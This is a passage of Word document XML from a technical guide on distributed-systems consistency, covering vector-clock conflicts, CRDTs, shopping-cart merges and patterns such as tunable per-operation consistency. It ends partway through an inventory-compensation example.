    <w:p w14:paraId="707D1B01" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Write at Node A: X=5, vclock={A:1, B:0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A81FBDD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Write at Node B: X=7, vclock={A:0, B:1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A8028F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="43770768" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>When syncing: neither vclock dominates the other (concurrent writes detected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48640A5B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>→ CONFLICT detected. System can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE1C47" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  a) Keep both versions (sibling values) → application resolves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF93C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  b) Apply merge function automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594234A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  c) Present both to user ("resolve conflict manually").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A8EFE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Riak (siblings), Amazon's original Dynamo paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ECA08E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRDTs (Conflict-Free Replicated Data Types):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D85235" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD6A74C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Data structures DESIGNED to merge without conflict:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD0BF7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="7120D839" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>G-Counter (grow-only counter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413E637" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node A increments: {A: 5, B: 0, C: 0} (total = 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7387D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node B increments: {A: 0, B: 3, C: 0} (total = 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F6EB2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Merge: {A: 5, B: 3, C: 0} (total = 8)  ← no conflict, mathematically correct!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6547E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="50D43798" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>OR-Set (observed-remove set):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865A98B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node A adds "apple": set = {"apple"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2625D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node B adds "banana": set = {"banana"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25869C1F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Merge: set = {"apple", "banana"} ← both preserved, no conflict!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38202435" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4419E204" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>LWW-Register (last-writer-wins register):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30008859" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node A sets X="hello" at T=100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7B9075" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node B sets X="world" at T=102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62618EFA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Merge: X="world" (highest timestamp wins) ← deterministic convergence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B6E8AE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRDT properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B094F94" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mathematically guaranteed convergence:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> All replicas reach the same state regardless of message order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E979E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No coordination needed:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Merge is local, deterministic, commutative, associative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B3A60" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limited operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Not all data types can be expressed as CRDTs (arbitrary overwrite can't).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440B54A2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Redis (CRDB), Riak, Automerge (collaborative editing), Phoenix LiveView.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAA9F1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-Level Merge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711622EB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79467D31" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Shopping cart conflict:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203DC042" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Replica A cart: [item1, item2, item3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C055666" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Replica B cart: [item1, item4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0909F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349107C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Application merge: UNION of both → [item1, item2, item3, item4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A2E1A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  (Never lose items from a cart — merge by taking all unique items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297791B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="780DDC98" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>This requires domain knowledge — the database can't do it generically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4A09D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="46CD13D0">
          <v:rect id="_x0000_i6042" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622885D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Real-World Consistency Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6561D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Pattern: Strong for Writes, Eventual for Reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB279D1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF81440" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072DC67A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Writes → Primary (single source of truth, strongly consistent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0223E707" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Reads → Replicas (eventually consistent, may be slightly stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662AD91" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A96C19" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>When user MUST see fresh data → read from primary (or wait for replica to catch up).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4AC16" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>When slight staleness is OK → read from any replica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A99E5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="349E9EC3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>This is the most common pattern in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443D7E00" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>90% of reads go to replicas (fast, distributed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061793B4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>10% of reads (user's own data after write) go to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A21BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Pattern: Consistency at the Boundary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CC565" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D91F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Within a single service/shard: strong consistency (local transactions, ACID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77850472" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Across services/shards: eventual consistency (async events, sagas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45087C34" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="7191BB38" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Example: E-commerce order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8357F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Within "Orders" service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9478A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Create order + debit inventory → single transaction (ACID, strong)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA6375" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC64FAD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Across services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB8753" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Order placed → event published → Payment service processes → event → Shipping service notifies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B34F25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (Eventually consistent across services — but each service is internally consistent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F03009" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Pattern: Tunable Consistency per Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F8AD5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DE4BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Same database, different consistency requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD4548" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="7447C973" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Payment processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01082902" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  db.payments.insert(payment, writeConcern: "majority", readConcern: "linearizable")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3119D851" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  // Strong: can't lose payments, can't double-charge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C63CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6FDDCD02" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>User preferences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0EAEED" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  db.preferences.update(prefs, writeConcern: 1, readConcern: "local")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5994D5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  // Eventual: if dark mode takes 2 seconds to propagate, nobody cares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AFAE4F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="0EBEDB27" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Product view count:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA2176" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  db.products.update({$inc: {views: 1}}, writeConcern: 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131291D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  // Fire-and-forget: losing a few view counts is acceptable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71ED7A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 Pattern: Compensation for Eventual Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB02B47" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747900FB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Problem: Eventually consistent system allows a "conflict" to happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6127943E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Solution: Detect and compensate after the fact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F007D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="2B729FD1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Example: Two users "buy" the last item (inventory check was stale):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6769D7AF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  T=0: Inventory = 1 (both replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62844EB5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
